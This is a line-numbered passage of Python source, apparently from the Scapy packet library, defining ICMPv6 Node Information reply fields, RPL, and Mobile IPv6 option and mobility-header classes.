2591 name = "ICMPv6 Node Information Query - IPv4 Address Query" 

2592 qtype = 4 

2593 

2594 

2595_nireply_code = {0: "Successful Reply", 

2596 1: "Response Refusal", 

2597 3: "Unknown query type"} 

2598 

2599_nireply_flags = {1: "Reply set incomplete", 

2600 2: "All unicast addresses", 

2601 4: "IPv4 addresses", 

2602 8: "Link-local addresses", 

2603 16: "Site-local addresses", 

2604 32: "Global addresses"} 

2605 

2606# Internal repr is one of those : 

2607# (0, "some string") : unknown qtype value are mapped to that one 

2608# (3, [ (ttl, ip6), ... ]) 

2609# (4, [ (ttl, ip4), ... ]) 

2610# (2, [ttl, dns_names]) : dns_names is one string that contains 

2611# all the DNS names. Internally it is kept ready to be sent 

2612# (undissected). i2repr() decode it for user. This is to 

2613# make build after dissection bijective. 

2614# 

2615# I also merged getfield() and m2i(), and addfield() and i2m(). 

2616 

2617 

2618class NIReplyDataField(StrField): 

2619 

2620 def i2h(self, pkt, x): 

2621 if x is None: 

2622 return x 

2623 t, val = x 

2624 if t == 2: 

2625 ttl, dnsnames = val 

2626 val = [ttl] + dnsrepr2names(dnsnames) 

2627 return val 

2628 

2629 def h2i(self, pkt, x): 

2630 qtype = 0 # We will decode it as string if not 

2631 # overridden through 'qtype' in pkt 

2632 

2633 # No user hint, let's use 'qtype' value for that purpose 

2634 if not isinstance(x, tuple): 

2635 if pkt is not None: 

2636 qtype = pkt.qtype 

2637 else: 

2638 qtype = x[0] 

2639 x = x[1] 

2640 

2641 # From that point on, x is the value (second element of the tuple) 

2642 

2643 if qtype == 2: # DNS name 

2644 if isinstance(x, (str, bytes)): # listify the string 

2645 x = [x] 

2646 if isinstance(x, list): 

2647 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501 

2648 if x and isinstance(x[0], int): 

2649 ttl = x[0] 

2650 names = x[1:] 

2651 else: 

2652 ttl = 0 

2653 names = x 

2654 return (2, [ttl, names2dnsrepr(names)]) 

2655 

2656 elif qtype in [3, 4]: # IPv4 or IPv6 addr 

2657 if not isinstance(x, list): 

2658 x = [x] # User directly provided an IP, instead of list 

2659 

2660 def fixvalue(x): 

2661 # List elements are not tuples, user probably 

2662 # omitted ttl value : we will use 0 instead 

2663 if not isinstance(x, tuple): 

2664 x = (0, x) 

2665 # Decode bytes 

2666 if isinstance(x[1], bytes): 

2667 x = (x[0], x[1].decode()) 

2668 return x 

2669 

2670 return (qtype, [fixvalue(d) for d in x]) 

2671 

2672 return (qtype, x) 

2673 

2674 def addfield(self, pkt, s, val): 

2675 t, tmp = val 

2676 if tmp is None: 

2677 tmp = b"" 

2678 if t == 2: 

2679 ttl, dnsstr = tmp 

2680 return s + struct.pack("!I", ttl) + dnsstr 

2681 elif t == 3: 

2682 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501 

2683 elif t == 4: 

2684 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501 

2685 else: 

2686 return s + tmp 

2687 

2688 def getfield(self, pkt, s): 

2689 code = getattr(pkt, "code") 

2690 if code != 0: 

2691 return s, (0, b"") 

2692 

2693 qtype = getattr(pkt, "qtype") 

2694 if qtype == 0: # NOOP 

2695 return s, (0, b"") 

2696 

2697 elif qtype == 2: 

2698 if len(s) < 4: 

2699 return s, (0, b"") 

2700 ttl = struct.unpack("!I", s[:4])[0] 

2701 return b"", (2, [ttl, s[4:]]) 

2702 

2703 elif qtype == 3: # IPv6 addresses with TTLs 

2704 # XXX TODO : get the real length 

2705 res = [] 

2706 while len(s) >= 20: # 4 + 16 

2707 ttl = struct.unpack("!I", s[:4])[0] 

2708 ip = inet_ntop(socket.AF_INET6, s[4:20]) 

2709 res.append((ttl, ip)) 

2710 s = s[20:] 

2711 return s, (3, res) 

2712 

2713 elif qtype == 4: # IPv4 addresses with TTLs 

2714 # XXX TODO : get the real length 

2715 res = [] 

2716 while len(s) >= 8: # 4 + 4 

2717 ttl = struct.unpack("!I", s[:4])[0] 

2718 ip = inet_ntop(socket.AF_INET, s[4:8]) 

2719 res.append((ttl, ip)) 

2720 s = s[8:] 

2721 return s, (4, res) 

2722 else: 

2723 # XXX TODO : implement me and deal with real length 

2724 return b"", (0, s) 

2725 

2726 def i2repr(self, pkt, x): 

2727 if x is None: 

2728 return "[]" 

2729 

2730 if isinstance(x, tuple) and len(x) == 2: 

2731 t, val = x 

2732 if t == 2: # DNS names 

2733 ttl, tmp_len = val 

2734 tmp_len = dnsrepr2names(tmp_len) 

2735 names_list = (plain_str(name) for name in tmp_len) 

2736 return "ttl:%d %s" % (ttl, ",".join(names_list)) 

2737 elif t == 3 or t == 4: 

2738 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501 

2739 return repr(val) 

2740 return repr(x) # XXX should not happen 

2741 

2742# By default, sent responses have code set to 0 (successful) 

2743 

2744 

2745class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6): 

2746 name = "ICMPv6 Node Information Reply - NOOP Reply" 

2747 fields_desc = [ByteEnumField("type", 140, icmp6types), 

2748 ByteEnumField("code", 0, _nireply_code), 

2749 XShortField("cksum", None), 

2750 ShortEnumField("qtype", 0, icmp6_niqtypes), 

2751 BitField("unused", 0, 10), 

2752 FlagsField("flags", 0, 6, "TACLSG"), 

2753 NonceField("nonce", None), 

2754 NIReplyDataField("data", None)] 

2755 

2756 

2757class ICMPv6NIReplyName(ICMPv6NIReplyNOOP): 

2758 name = "ICMPv6 Node Information Reply - Node Names" 

2759 qtype = 2 

2760 

2761 

2762class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP): 

2763 name = "ICMPv6 Node Information Reply - IPv6 addresses" 

2764 qtype = 3 

2765 

2766 

2767class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP): 

2768 name = "ICMPv6 Node Information Reply - IPv4 addresses" 

2769 qtype = 4 

2770 

2771 

2772class ICMPv6NIReplyRefuse(ICMPv6NIReplyNOOP): 

2773 name = "ICMPv6 Node Information Reply - Responder refuses to supply answer" 

2774 code = 1 

2775 

2776 

2777class ICMPv6NIReplyUnknown(ICMPv6NIReplyNOOP): 

2778 name = "ICMPv6 Node Information Reply - Qtype unknown to the responder" 

2779 code = 2 

2780 

2781 

2782def _niquery_guesser(p): 

2783 cls = conf.raw_layer 

2784 type = orb(p[0]) 

2785 if type == 139: # Node Info Query specific stuff 

2786 if len(p) > 6: 

2787 qtype, = struct.unpack("!H", p[4:6]) 

2788 cls = {0: ICMPv6NIQueryNOOP, 

2789 2: ICMPv6NIQueryName, 

2790 3: ICMPv6NIQueryIPv6, 

2791 4: ICMPv6NIQueryIPv4}.get(qtype, conf.raw_layer) 

2792 elif type == 140: # Node Info Reply specific stuff 

2793 code = orb(p[1]) 

2794 if code == 0: 

2795 if len(p) > 6: 

2796 qtype, = struct.unpack("!H", p[4:6]) 

2797 cls = {2: ICMPv6NIReplyName, 

2798 3: ICMPv6NIReplyIPv6, 

2799 4: ICMPv6NIReplyIPv4}.get(qtype, ICMPv6NIReplyNOOP) 

2800 elif code == 1: 

2801 cls = ICMPv6NIReplyRefuse 

2802 elif code == 2: 

2803 cls = ICMPv6NIReplyUnknown 

2804 return cls 

2805 

2806 

2807############################################################################# 

2808############################################################################# 

2809# Routing Protocol for Low Power and Lossy Networks RPL (RFC 6550) # 

2810############################################################################# 

2811############################################################################# 

2812 

2813# https://www.iana.org/assignments/rpl/rpl.xhtml#control-codes 

2814rplcodes = {0: "DIS", 

2815 1: "DIO", 

2816 2: "DAO", 

2817 3: "DAO-ACK", 

2818 # 4: "P2P-DRO", 

2819 # 5: "P2P-DRO-ACK", 

2820 # 6: "Measurement", 

2821 7: "DCO", 

2822 8: "DCO-ACK"} 

2823 

2824 

2825class ICMPv6RPL(_ICMPv6): # RFC 6550 

2826 name = 'RPL' 

2827 fields_desc = [ByteEnumField("type", 155, icmp6types), 

2828 ByteEnumField("code", 0, rplcodes), 

2829 XShortField("cksum", None)] 

2830 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1a"}} 

2831 

2832 

2833############################################################################# 

2834############################################################################# 

2835# Mobile IPv6 (RFC 3775) and Nemo (RFC 3963) # 

2836############################################################################# 

2837############################################################################# 

2838 

2839# Mobile IPv6 ICMPv6 related classes 

2840 

2841class ICMPv6HAADRequest(_ICMPv6): 

2842 name = 'ICMPv6 Home Agent Address Discovery Request' 

2843 fields_desc = [ByteEnumField("type", 144, icmp6types), 

2844 ByteField("code", 0), 

2845 XShortField("cksum", None), 

2846 XShortField("id", None), 

2847 BitEnumField("R", 1, 1, {1: 'MR'}), 

2848 XBitField("res", 0, 15)] 

2849 

2850 def hashret(self): 

2851 return struct.pack("!H", self.id) + self.payload.hashret() 

2852 

2853 

2854class ICMPv6HAADReply(_ICMPv6): 

2855 name = 'ICMPv6 Home Agent Address Discovery Reply' 

2856 fields_desc = [ByteEnumField("type", 145, icmp6types), 

2857 ByteField("code", 0), 

2858 XShortField("cksum", None), 

2859 XShortField("id", None), 

2860 BitEnumField("R", 1, 1, {1: 'MR'}), 

2861 XBitField("res", 0, 15), 

2862 IP6ListField('addresses', None)] 

2863 

2864 def hashret(self): 

2865 return struct.pack("!H", self.id) + self.payload.hashret() 

2866 

2867 def answers(self, other): 

2868 if not isinstance(other, ICMPv6HAADRequest): 

2869 return 0 

2870 return self.id == other.id 

2871 

2872 

2873class ICMPv6MPSol(_ICMPv6): 

2874 name = 'ICMPv6 Mobile Prefix Solicitation' 

2875 fields_desc = [ByteEnumField("type", 146, icmp6types), 

2876 ByteField("code", 0), 

2877 XShortField("cksum", None), 

2878 XShortField("id", None), 

2879 XShortField("res", 0)] 

2880 

2881 def _hashret(self): 

2882 return struct.pack("!H", self.id) 

2883 

2884 

2885class ICMPv6MPAdv(_ICMPv6NDGuessPayload, _ICMPv6): 

2886 name = 'ICMPv6 Mobile Prefix Advertisement' 

2887 fields_desc = [ByteEnumField("type", 147, icmp6types), 

2888 ByteField("code", 0), 

2889 XShortField("cksum", None), 

2890 XShortField("id", None), 

2891 BitEnumField("flags", 2, 2, {2: 'M', 1: 'O'}), 

2892 XBitField("res", 0, 14)] 

2893 

2894 def hashret(self): 

2895 return struct.pack("!H", self.id) 

2896 

2897 def answers(self, other): 

2898 return isinstance(other, ICMPv6MPSol) 

2899 

2900# Mobile IPv6 Options classes 

2901 

2902 

2903_mobopttypes = {2: "Binding Refresh Advice", 

2904 3: "Alternate Care-of Address", 

2905 4: "Nonce Indices", 

2906 5: "Binding Authorization Data", 

2907 6: "Mobile Network Prefix (RFC3963)", 

2908 7: "Link-Layer Address (RFC4068)", 

2909 8: "Mobile Node Identifier (RFC4283)", 

2910 9: "Mobility Message Authentication (RFC4285)", 

2911 10: "Replay Protection (RFC4285)", 

2912 11: "CGA Parameters Request (RFC4866)", 

2913 12: "CGA Parameters (RFC4866)", 

2914 13: "Signature (RFC4866)", 

2915 14: "Home Keygen Token (RFC4866)", 

2916 15: "Care-of Test Init (RFC4866)", 

2917 16: "Care-of Test (RFC4866)"} 

2918 

2919 

2920class _MIP6OptAlign(Packet): 

2921 """ Mobile IPv6 options have alignment requirements of the form x*n+y. 

2922 This class is inherited by all MIPv6 options to help in computing the 

2923 required Padding for that option, i.e. the need for a Pad1 or PadN 

2924 option before it. They only need to provide x and y as class 

2925 parameters. (x=0 and y=0 are used when no alignment is required)""" 

2926 

2927 __slots__ = ["x", "y"] 

2928 

2929 def alignment_delta(self, curpos): 

2930 x = self.x 

2931 y = self.y 

2932 if x == 0 and y == 0: 

2933 return 0 

2934 delta = x * ((curpos - y + x - 1) // x) + y - curpos 

2935 return delta 

2936 

2937 def extract_padding(self, p): 

2938 return b"", p 

2939 

2940 

2941class MIP6OptBRAdvice(_MIP6OptAlign): 

2942 name = 'Mobile IPv6 Option - Binding Refresh Advice' 

2943 fields_desc = [ByteEnumField('otype', 2, _mobopttypes), 

2944 ByteField('olen', 2), 

2945 ShortField('rinter', 0)] 

2946 x = 2 

2947 y = 0 # alignment requirement: 2n 

2948 

2949 

2950class MIP6OptAltCoA(_MIP6OptAlign): 

2951 name = 'MIPv6 Option - Alternate Care-of Address' 

2952 fields_desc = [ByteEnumField('otype', 3, _mobopttypes), 

2953 ByteField('olen', 16), 

2954 IP6Field("acoa", "::")] 

2955 x = 8 

2956 y = 6 # alignment requirement: 8n+6 

2957 

2958 

2959class MIP6OptNonceIndices(_MIP6OptAlign): 

2960 name = 'MIPv6 Option - Nonce Indices' 

2961 fields_desc = [ByteEnumField('otype', 4, _mobopttypes), 

2962 ByteField('olen', 16), 

2963 ShortField('hni', 0), 

2964 ShortField('coni', 0)] 

2965 x = 2 

2966 y = 0 # alignment requirement: 2n 

2967 

2968 

2969class MIP6OptBindingAuthData(_MIP6OptAlign): 

2970 name = 'MIPv6 Option - Binding Authorization Data' 

2971 fields_desc = [ByteEnumField('otype', 5, _mobopttypes), 

2972 ByteField('olen', 16), 

2973 BitField('authenticator', 0, 96)] 

2974 x = 8 

2975 y = 2 # alignment requirement: 8n+2 

2976 

2977 

2978class MIP6OptMobNetPrefix(_MIP6OptAlign): # NEMO - RFC 3963 

2979 name = 'NEMO Option - Mobile Network Prefix' 

2980 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 

2981 ByteField("olen", 18), 

2982 ByteField("reserved", 0), 

2983 ByteField("plen", 64), 

2984 IP6Field("prefix", "::")] 

2985 x = 8 

2986 y = 4 # alignment requirement: 8n+4 

2987 

2988 

2989class MIP6OptLLAddr(_MIP6OptAlign): # Sect 6.4.4 of RFC 4068 

2990 name = "MIPv6 Option - Link-Layer Address (MH-LLA)" 

2991 fields_desc = [ByteEnumField("otype", 7, _mobopttypes), 

2992 ByteField("olen", 7), 

2993 ByteEnumField("ocode", 2, _rfc4068_lla_optcode), 

2994 ByteField("pad", 0), 

2995 MACField("lla", ETHER_ANY)] # Only support ethernet 

2996 x = 0 

2997 y = 0 # alignment requirement: none 

2998 

2999 

3000class MIP6OptMNID(_MIP6OptAlign): # RFC 4283 

3001 name = "MIPv6 Option - Mobile Node Identifier" 

3002 fields_desc = [ByteEnumField("otype", 8, _mobopttypes), 

3003 FieldLenField("olen", None, length_of="id", fmt="B", 

3004 adjust=lambda pkt, x: x + 1), 

3005 ByteEnumField("subtype", 1, {1: "NAI"}), 

3006 StrLenField("id", "", 

3007 length_from=lambda pkt: pkt.olen - 1)] 

3008 x = 0 

3009 y = 0 # alignment requirement: none 

3010 

3011# We only support decoding and basic build. Automatic HMAC computation is 

3012# too much work for our current needs. It is left to the user (I mean ... 

3013# you). --arno 

3014 

3015 

3016class MIP6OptMsgAuth(_MIP6OptAlign): # RFC 4285 (Sect. 5) 

3017 name = "MIPv6 Option - Mobility Message Authentication" 

3018 fields_desc = [ByteEnumField("otype", 9, _mobopttypes), 

3019 FieldLenField("olen", None, length_of="authdata", fmt="B", 

3020 adjust=lambda pkt, x: x + 5), 

3021 ByteEnumField("subtype", 1, {1: "MN-HA authentication mobility option", # noqa: E501 

3022 2: "MN-AAA authentication mobility option"}), # noqa: E501 

3023 IntField("mspi", None), 

3024 StrLenField("authdata", "A" * 12, 

3025 length_from=lambda pkt: pkt.olen - 5)] 

3026 x = 4 

3027 y = 1 # alignment requirement: 4n+1 

3028 

3029# Extracted from RFC 1305 (NTP) : 

3030# NTP timestamps are represented as a 64-bit unsigned fixed-point number, 

3031# in seconds relative to 0h on 1 January 1900. The integer part is in the 

3032# first 32 bits and the fraction part in the last 32 bits. 

3033 

3034 

3035class NTPTimestampField(LongField): 

3036 def i2repr(self, pkt, x): 

3037 if x < ((50 * 31536000) << 32): 

3038 return "Some date a few decades ago (%d)" % x 

3039 

3040 # delta from epoch (= (1900, 1, 1, 0, 0, 0, 5, 1, 0)) to 

3041 # January 1st 1970 : 

3042 delta = -2209075761 

3043 i = int(x >> 32) 

3044 j = float(x & 0xffffffff) * 2.0**-32 

3045 res = i + j + delta 

3046 t = strftime("%a, %d %b %Y %H:%M:%S +0000", gmtime(res)) 

3047 

3048 return "%s (%d)" % (t, x) 

3049 

3050 

3051class MIP6OptReplayProtection(_MIP6OptAlign): # RFC 4285 (Sect. 6) 

3052 name = "MIPv6 option - Replay Protection" 

3053 fields_desc = [ByteEnumField("otype", 10, _mobopttypes), 

3054 ByteField("olen", 8), 

3055 NTPTimestampField("timestamp", 0)] 

3056 x = 8 

3057 y = 2 # alignment requirement: 8n+2 

3058 

3059 

3060class MIP6OptCGAParamsReq(_MIP6OptAlign): # RFC 4866 (Sect. 5.6) 

3061 name = "MIPv6 option - CGA Parameters Request" 

3062 fields_desc = [ByteEnumField("otype", 11, _mobopttypes), 

3063 ByteField("olen", 0)] 

3064 x = 0 

3065 y = 0 # alignment requirement: none 

3066 

3067# XXX TODO: deal with CGA param fragmentation and build of defragmented 

3068# XXX version. Passing of a big CGAParam structure should be 

3069# XXX simplified. Make it hold packets, by the way --arno 

3070 

3071 

3072class MIP6OptCGAParams(_MIP6OptAlign): # RFC 4866 (Sect. 5.1) 

3073 name = "MIPv6 option - CGA Parameters" 

3074 fields_desc = [ByteEnumField("otype", 12, _mobopttypes), 

3075 FieldLenField("olen", None, length_of="cgaparams", fmt="B"), 

3076 StrLenField("cgaparams", "", 

3077 length_from=lambda pkt: pkt.olen)] 

3078 x = 0 

3079 y = 0 # alignment requirement: none 

3080 

3081 

3082class MIP6OptSignature(_MIP6OptAlign): # RFC 4866 (Sect. 5.2) 

3083 name = "MIPv6 option - Signature" 

3084 fields_desc = [ByteEnumField("otype", 13, _mobopttypes), 

3085 FieldLenField("olen", None, length_of="sig", fmt="B"), 

3086 StrLenField("sig", "", 

3087 length_from=lambda pkt: pkt.olen)] 

3088 x = 0 

3089 y = 0 # alignment requirement: none 

3090 

3091 

3092class MIP6OptHomeKeygenToken(_MIP6OptAlign): # RFC 4866 (Sect. 5.3) 

3093 name = "MIPv6 option - Home Keygen Token" 

3094 fields_desc = [ByteEnumField("otype", 14, _mobopttypes), 

3095 FieldLenField("olen", None, length_of="hkt", fmt="B"), 

3096 StrLenField("hkt", "", 

3097 length_from=lambda pkt: pkt.olen)] 

3098 x = 0 

3099 y = 0 # alignment requirement: none 

3100 

3101 

3102class MIP6OptCareOfTestInit(_MIP6OptAlign): # RFC 4866 (Sect. 5.4) 

3103 name = "MIPv6 option - Care-of Test Init" 

3104 fields_desc = [ByteEnumField("otype", 15, _mobopttypes), 

3105 ByteField("olen", 0)] 

3106 x = 0 

3107 y = 0 # alignment requirement: none 

3108 

3109 

3110class MIP6OptCareOfTest(_MIP6OptAlign): # RFC 4866 (Sect. 5.5) 

3111 name = "MIPv6 option - Care-of Test" 

3112 fields_desc = [ByteEnumField("otype", 16, _mobopttypes), 

3113 FieldLenField("olen", None, length_of="cokt", fmt="B"), 

3114 StrLenField("cokt", b'\x00' * 8, 

3115 length_from=lambda pkt: pkt.olen)] 

3116 x = 0 

3117 y = 0 # alignment requirement: none 

3118 

3119 

3120class MIP6OptUnknown(_MIP6OptAlign): 

3121 name = 'Scapy6 - Unknown Mobility Option' 

3122 fields_desc = [ByteEnumField("otype", 6, _mobopttypes), 

3123 FieldLenField("olen", None, length_of="odata", fmt="B"), 

3124 StrLenField("odata", "", 

3125 length_from=lambda pkt: pkt.olen)] 

3126 x = 0 

3127 y = 0 # alignment requirement: none 

3128 

3129 @classmethod 

3130 def dispatch_hook(cls, _pkt=None, *_, **kargs): 

3131 if _pkt: 

3132 o = orb(_pkt[0]) # Option type 

3133 if o in moboptcls: 

3134 return moboptcls[o] 

3135 return cls 

3136 

3137 

3138moboptcls = {0: Pad1, 

3139 1: PadN, 

3140 2: MIP6OptBRAdvice, 

3141 3: MIP6OptAltCoA, 

3142 4: MIP6OptNonceIndices, 

3143 5: MIP6OptBindingAuthData, 

3144 6: MIP6OptMobNetPrefix, 

3145 7: MIP6OptLLAddr, 

3146 8: MIP6OptMNID, 

3147 9: MIP6OptMsgAuth, 

3148 10: MIP6OptReplayProtection, 

3149 11: MIP6OptCGAParamsReq, 

3150 12: MIP6OptCGAParams, 

3151 13: MIP6OptSignature, 

3152 14: MIP6OptHomeKeygenToken, 

3153 15: MIP6OptCareOfTestInit, 

3154 16: MIP6OptCareOfTest} 

3155 

3156 

3157# Main Mobile IPv6 Classes 

3158 

3159mhtypes = {0: 'BRR', 

3160 1: 'HoTI', 

3161 2: 'CoTI', 

3162 3: 'HoT', 

3163 4: 'CoT', 

3164 5: 'BU', 

3165 6: 'BA', 

3166 7: 'BE', 

3167 8: 'Fast BU', 

3168 9: 'Fast BA', 

3169 10: 'Fast NA'} 

3170 

3171# From http://www.iana.org/assignments/mobility-parameters 

3172bastatus = {0: 'Binding Update accepted', 

3173 1: 'Accepted but prefix discovery necessary', 

3174 128: 'Reason unspecified', 

3175 129: 'Administratively prohibited', 

3176 130: 'Insufficient resources', 

3177 131: 'Home registration not supported', 

3178 132: 'Not home subnet', 

3179 133: 'Not home agent for this mobile node', 

3180 134: 'Duplicate Address Detection failed', 

3181 135: 'Sequence number out of window', 

3182 136: 'Expired home nonce index', 

3183 137: 'Expired care-of nonce index', 

3184 138: 'Expired nonces', 

3185 139: 'Registration type change disallowed', 

3186 140: 'Mobile Router Operation not permitted', 

3187 141: 'Invalid Prefix', 

3188 142: 'Not Authorized for Prefix', 

3189 143: 'Forwarding Setup failed (prefixes missing)', 

3190 144: 'MIPV6-ID-MISMATCH', 

3191 145: 'MIPV6-MESG-ID-REQD', 

3192 146: 'MIPV6-AUTH-FAIL', 

3193 147: 'Permanent home keygen token unavailable', 

3194 148: 'CGA and signature verification failed', 

3195 149: 'Permanent home keygen token exists', 

3196 150: 'Non-null home nonce index expected'} 

3197 

3198 

3199class _MobilityHeader(Packet): 

3200 name = 'Dummy IPv6 Mobility Header' 

3201 overload_fields = {IPv6: {"nh": 135}} 

3202 

3203 def post_build(self, p, pay): 

3204 p += pay 

3205 tmp_len = self.len 

3206 if self.len is None: 

3207 tmp_len = (len(p) - 8) // 8 

3208 p = p[:1] + struct.pack("B", tmp_len) + p[2:] 

3209 if self.cksum is None: 

3210 cksum = in6_chksum(135, self.underlayer, p) 

3211 else: 

3212 cksum = self.cksum 

3213 p = p[:4] + struct.pack("!H", cksum) + p[6:] 

3214 return p 

3215 

3216 

3217class MIP6MH_Generic(_MobilityHeader): # Mainly for decoding of unknown msg 

3218 name = "IPv6 Mobility Header - Generic Message" 

3219 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3220 ByteField("len", None), 

3221 ByteEnumField("mhtype", None, mhtypes), 

3222 ByteField("res", None), 

3223 XShortField("cksum", None), 

3224 StrLenField("msg", b"\x00" * 2, 

3225 length_from=lambda pkt: 8 * pkt.len - 6)] 

3226 

3227 

3228class MIP6MH_BRR(_MobilityHeader): 

3229 name = "IPv6 Mobility Header - Binding Refresh Request" 

3230 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3231 ByteField("len", None), 

3232 ByteEnumField("mhtype", 0, mhtypes), 

3233 ByteField("res", None), 

3234 XShortField("cksum", None), 

3235 ShortField("res2", None), 

3236 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3237 _OptionsField("options", [], MIP6OptUnknown, 8, 

3238 length_from=lambda pkt: 8 * pkt.len)] 

3239 overload_fields = {IPv6: {"nh": 135}} 

3240 

3241 def hashret(self): 

3242 # Hack: BRR, BU and BA have the same hashret that returns the same 

3243 # value b"\x00\x08\x09" (concatenation of mhtypes). This is 

3244 # because we need match BA with BU and BU with BRR. --arno 

3245 return b"\x00\x08\x09" 

3246 

3247 

3248class MIP6MH_HoTI(_MobilityHeader): 

3249 name = "IPv6 Mobility Header - Home Test Init" 

3250 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3251 ByteField("len", None), 

3252 ByteEnumField("mhtype", 1, mhtypes), 

3253 ByteField("res", None), 

3254 XShortField("cksum", None), 

3255 StrFixedLenField("reserved", b"\x00" * 2, 2), 

3256 StrFixedLenField("cookie", b"\x00" * 8, 8), 

3257 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3258 _OptionsField("options", [], MIP6OptUnknown, 16, 

3259 length_from=lambda pkt: 8 * (pkt.len - 1))] 

3260 overload_fields = {IPv6: {"nh": 135}} 

3261 

3262 def hashret(self): 

3263 return bytes_encode(self.cookie) 

3264 

3265 

3266class MIP6MH_CoTI(MIP6MH_HoTI): 

3267 name = "IPv6 Mobility Header - Care-of Test Init" 

3268 mhtype = 2 

3269 

3270 def hashret(self): 

3271 return bytes_encode(self.cookie) 

3272 

3273 

3274class MIP6MH_HoT(_MobilityHeader): 

3275 name = "IPv6 Mobility Header - Home Test" 

3276 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3277 ByteField("len", None), 

3278 ByteEnumField("mhtype", 3, mhtypes), 

3279 ByteField("res", None), 

3280 XShortField("cksum", None), 

3281 ShortField("index", None), 

3282 StrFixedLenField("cookie", b"\x00" * 8, 8), 

3283 StrFixedLenField("token", b"\x00" * 8, 8), 

3284 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3285 _OptionsField("options", [], MIP6OptUnknown, 24, 

3286 length_from=lambda pkt: 8 * (pkt.len - 2))] 

3287 overload_fields = {IPv6: {"nh": 135}} 

3288 

3289 def hashret(self): 

3290 return bytes_encode(self.cookie) 

3291 

3292 def answers(self, other): 

3293 if (isinstance(other, MIP6MH_HoTI) and 

3294 self.cookie == other.cookie): 

3295 return 1 

3296 return 0 

3297 

3298 

3299class MIP6MH_CoT(MIP6MH_HoT): 

3300 name = "IPv6 Mobility Header - Care-of Test" 

3301 mhtype = 4 

3302 

3303 def hashret(self): 

3304 return bytes_encode(self.cookie) 

3305 

3306 def answers(self, other): 

3307 if (isinstance(other, MIP6MH_CoTI) and 

3308 self.cookie == other.cookie): 

3309 return 1 

3310 return 0 

3311 

3312 

3313class LifetimeField(ShortField): 

3314 def i2repr(self, pkt, x): 

3315 return "%d sec" % (4 * x) 

3316 

3317 

3318class MIP6MH_BU(_MobilityHeader): 

3319 name = "IPv6 Mobility Header - Binding Update" 

3320 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3321 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3322 ByteEnumField("mhtype", 5, mhtypes), 

3323 ByteField("res", None), 

3324 XShortField("cksum", None), 

3325 XShortField("seq", None), # TODO: ShortNonceField 

3326 FlagsField("flags", "KHA", 7, "PRMKLHA"), 

3327 XBitField("reserved", 0, 9), 

3328 LifetimeField("mhtime", 3), # unit == 4 seconds 

3329 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3330 _OptionsField("options", [], MIP6OptUnknown, 12, 

3331 length_from=lambda pkt: 8 * pkt.len - 4)] 

3332 overload_fields = {IPv6: {"nh": 135}} 

3333 

3334 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 

3335 return b"\x00\x08\x09" 

3336 

3337 def answers(self, other): 

3338 if isinstance(other, MIP6MH_BRR): 

3339 return 1 

3340 return 0 

3341 

3342 

3343class MIP6MH_BA(_MobilityHeader): 

3344 name = "IPv6 Mobility Header - Binding ACK" 

3345 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3346 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3347 ByteEnumField("mhtype", 6, mhtypes), 

3348 ByteField("res", None), 

3349 XShortField("cksum", None), 

3350 ByteEnumField("status", 0, bastatus), 

3351 FlagsField("flags", "K", 3, "PRK"), 

3352 XBitField("res2", None, 5), 

3353 XShortField("seq", None), # TODO: ShortNonceField 

3354 XShortField("mhtime", 0), # unit == 4 seconds 

3355 _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 

3356 _OptionsField("options", [], MIP6OptUnknown, 12, 

3357 length_from=lambda pkt: 8 * pkt.len - 4)] 

3358 overload_fields = {IPv6: {"nh": 135}} 

3359 

3360 def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() 

3361 return b"\x00\x08\x09" 

3362 

3363 def answers(self, other): 

3364 if (isinstance(other, MIP6MH_BU) and 

3365 other.mhtype == 5 and 

3366 self.mhtype == 6 and 

3367 other.flags & 0x1 and # Ack request flags is set 

3368 self.seq == other.seq): 

3369 return 1 

3370 return 0 

3371 

3372 

3373_bestatus = {1: 'Unknown binding for Home Address destination option', 

3374 2: 'Unrecognized MH Type value'} 

3375 

3376# TODO: match Binding Error to its stimulus 

3377 

3378 

3379class MIP6MH_BE(_MobilityHeader): 

3380 name = "IPv6 Mobility Header - Binding Error" 

3381 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 

3382 ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 

3383 ByteEnumField("mhtype", 7, mhtypes), 

3384 ByteField("res", 0), 

3385 XShortField("cksum", None), 

3386 ByteEnumField("status", 0, _bestatus), 

3387 ByteField("reserved", 0), 

3388 IP6Field("ha", "::"), 

3389 _OptionsField("options", [], MIP6OptUnknown, 24, 

3390 length_from=lambda pkt: 8 * (pkt.len - 2))] 

3391 overload_fields = {IPv6: {"nh": 135}} 

3392 

3393 

3394_mip6_mhtype2cls = {0: MIP6MH_BRR, 

3395 1: MIP6MH_HoTI, 

3396 2: MIP6MH_CoTI, 

3397 3: MIP6MH_HoT, 

3398 4: MIP6MH_CoT, 

3399 5: MIP6MH_BU, 

3400 6: MIP6MH_BA, 

3401 7: MIP6MH_BE} 

3402 

3403 

3404############################################################################# 

3405############################################################################# 

3406# Traceroute6 # 

